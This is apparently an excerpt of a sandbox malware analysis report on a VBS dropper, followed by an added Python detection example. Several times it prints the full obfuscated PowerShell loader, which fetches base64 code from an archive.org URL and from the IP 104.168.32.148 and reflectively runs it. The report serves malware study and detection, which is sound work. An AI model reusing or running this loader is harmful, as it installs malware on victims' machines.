( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKyd
              No Suricata rule has matched

              AV Detection

Source: kz1fEn2R9Z.vbs | ReversingLabs: Detection: 26%
Source: kz1fEn2R9Z.vbs | Virustotal: Detection: 12%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.2% probability
Source: unknown | HTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1754168405.000001A61E429000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dbpdbtem.pdb source: powershell.exe, 00000003.00000002.1754168405.000001A61E429000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: e.pdb+ source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbp source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000003.00000002.1788155155.000001A636EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.1770505012.000001A62F7FE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb# source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 50e96378b6e77999stem.pdb source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1787469124.000001A636B3F000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic | HTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1 Host: ia600100.us.archive.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /345/CHPPZA.txt HTTP/1.1 Host: 104.168.32.148 Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 104.168.32.148
Source: Joe Sandbox View | IP Address: 207.241.227.240
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.32.148
Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.32.148
Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.32.148
Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.32.148
Source: unknown | TCP traffic detected without corresponding DNS query: 104.168.32.148
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1 Host: ia600100.us.archive.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /345/CHPPZA.txt HTTP/1.1 Host: 104.168.32.148 Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: ia600100.us.archive.org
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 02 Oct 2024 03:30:44 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25Content-Length: 300Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 31 2e 32 35 20 53 65 72 76 65 72 20 61 74 20 31 30 34 2e 31 36 38 2e 33 32 2e 31 34 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Server at 104.168.32.148 Port 80</address></body></html>
Source: powershell.exe, 00000003.00000002.1754476864.000001A61EC0A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://104.168.32.148
Source: powershell.exe, 00000003.00000002.1754476864.000001A61EC0A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://104.168.32.148/345/CHPPZA.txt
Source: powershell.exe, 00000003.00000002.1754476864.000001A61FEBA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ia600100.us.archive.org
Source: powershell.exe, 00000003.00000002.1770505012.000001A62E855000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A620270000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.1754476864.000001A61EA04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A61FF02000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1801623265.000001B680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A61E7E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1754476864.000001A61FF02000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000003.00000002.1754476864.000001A61EA04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A61FF02000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1801623265.000001B680053000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000001.00000002.1801623265.000001B68006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A61E7E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000003.00000002.1754476864.000001A620270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000003.00000002.1754476864.000001A620270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000003.00000002.1754476864.000001A620270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000003.00000002.1754476864.000001A61EA04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A61FF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000003.00000002.1754476864.000001A61F949000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000003.00000002.1754168405.000001A61E3C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
              Source: powershell.exe, 00000003.00000002.1754476864.000001A61FEB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.arXz
              Source: powershell.exe, 00000003.00000002.1754476864.000001A61EA04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A61F949000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org
              Source: powershell.exe, 00000003.00000002.1754476864.000001A61EA04000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A61F949000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
              Source: powershell.exe, 00000003.00000002.1754476864.000001A61EA04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtCNA;gYFbase64Content
              Source: powershell.exe, 00000003.00000002.1770505012.000001A62E855000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1754476864.000001A620270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000003.00000002.1754476864.000001A61FF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000003.00000002.1754476864.000001A61FF02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.4:49730 version: TLS 1.2

              System Summary

              Source: Process Memory Space: powershell.exe PID: 7600, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7768, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9B810644
              Source: kz1fEn2R9Z.vbs | Initial sample: Strings found which are bigger than 50
              Source: Process Memory Space: powershell.exe PID: 7600, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7768, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine | Classification label: mal100.troj.expl.evad.winVBS@6/5@1/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aw3zflkn.xpi.ps1
              Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kz1fEn2R9Z.vbs"
              Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: kz1fEn2R9Z.vbs | ReversingLabs: Detection: 26%
              Source: kz1fEn2R9Z.vbs | Virustotal: Detection: 12%
              Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kz1fEn2R9Z.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"
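The process chain above (wscript.exe starting powershell.exe with a base64 blob, that powershell.exe starting a hidden, policy-bypassed second instance) is what the Sigma hits in the Signatures list key on. The following Python is an added example written for this page, not code from the Joe Sandbox report, from Sigma, or from the sample: it re-implements checks of that kind as plain predicates and runs them over process-creation records built from the command lines quoted in this section. The event layout, the rule names and the two benign comparison events are this example's own; the stage-1 base64 is truncated with "..." and the stage-2 one-liner is abbreviated, both marked as such in the code.

```python
"""Process-creation triage for the wscript.exe -> powershell.exe chain.

Added example for this page; not part of the Joe Sandbox report. The
rules mirror the idea of the Sigma hits the report lists, not their text.
"""
import ntpath
import re

# Constructed process-creation events. Command lines are copied from the
# report; the stage-1 base64 is truncated ("...") and the stage-2
# one-liner is abbreviated. The last two events are benign comparisons.
EVENTS = [
    {   # stage 1: wscript.exe hands powershell.exe a base64 blob
        "parent": r"C:\Windows\System32\wscript.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKyd...';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD''',
    },
    {   # stage 2: the decoded, concatenation-obfuscated one-liner (abbreviated)
        "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"''',
    },
    {   # conhost spawned by powershell: benign
        "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "image": r"C:\Windows\System32\conhost.exe",
        "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
    },
    {   # an interactive admin command (constructed): benign
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command Get-Service',
    },
]


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def _is_powershell(event) -> bool:
    return _basename(event["image"]) in {"powershell.exe", "pwsh.exe"}


# (rule name, predicate); predicates see the event and its lowercased command line.
# -e\w* / -w\w* accept the parameter prefixes PowerShell itself accepts.
RULES = [
    ("wscript_or_cscript_dropper",
     lambda e, cl: _basename(e["parent"]) in {"wscript.exe", "cscript.exe"} and _is_powershell(e)),
    ("execution_policy_bypass",
     lambda e, cl: _is_powershell(e) and re.search(r"-e\w*\s+bypass", cl) is not None),
    ("hidden_window",
     lambda e, cl: _is_powershell(e) and re.search(r"-w\w*\s+hidden", cl) is not None),
    ("base64_decode_cmdlet",        # only fires when the name survives as one token
     lambda e, cl: "frombase64string" in cl),
    ("comspec_index_obfuscation",   # $env:COMSPEC[4,26,25] -join '' spells a cmdlet from cmd.exe's path
     lambda e, cl: re.search(r"\$env:comspec\[\d+(?:,\d+)*\]", cl) is not None),
    ("reversed_http",               # 'ptth' is 'http' written backwards
     lambda e, cl: "//:ptth" in cl or "//:sptth" in cl),
    ("string_concat_obfuscation",   # dozens of 'a'+'b' joins in one command line
     lambda e, cl: cl.count("'+'") >= 10),
]


def evaluate(event) -> list:
    """Return the names of every rule the event matches, in RULES order."""
    cl = event["cmdline"].lower()
    return [name for name, pred in RULES if pred(event, cl)]


def triage(events) -> list:
    """Pair each event's hits with a flag; two or more hits is flagged."""
    return [(hits, len(hits) >= 2) for hits in map(evaluate, events)]


if __name__ == "__main__":
    for event, (hits, flagged) in zip(EVENTS, triage(EVENTS)):
        print("FLAG" if flagged else "ok  ", _basename(event["image"]), hits)
```

Note which rule fires where: the base64 rule only matches stage 1, because stage 2 spells the cmdlet as `']::FromBase64S'+'t'+'ring'` and no single substring of the command line reads FromBase64String. Stage 2 is caught instead by the structural rules (COMSPEC indexing, the reversed `//:ptth`, the sheer count of `'+'` joins), which is why both the parent/child relationship and the obfuscation patterns belong in the same rule set.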
              Source: C:\Windows\System32\wscript.exe | Section loaded (in load order): version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mlang.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded (in load order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded (in load order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll
              Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb | source: powershell.exe, 00000003.00000002.1754168405.000001A61E429000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb | source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dbpdbtem.pdb | source: powershell.exe, 00000003.00000002.1754168405.000001A61E429000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: e.pdb+ | source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdbp | source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Data.Linq.pdb | source: powershell.exe, 00000003.00000002.1788155155.000001A636EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.1770505012.000001A62F7FE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb | source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb# | source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 50e96378b6e77999stem.pdb | source: powershell.exe, 00000003.00000002.1787469124.000001A636B6B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb | source: powershell.exe, 00000003.00000002.1787469124.000001A636B3F000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

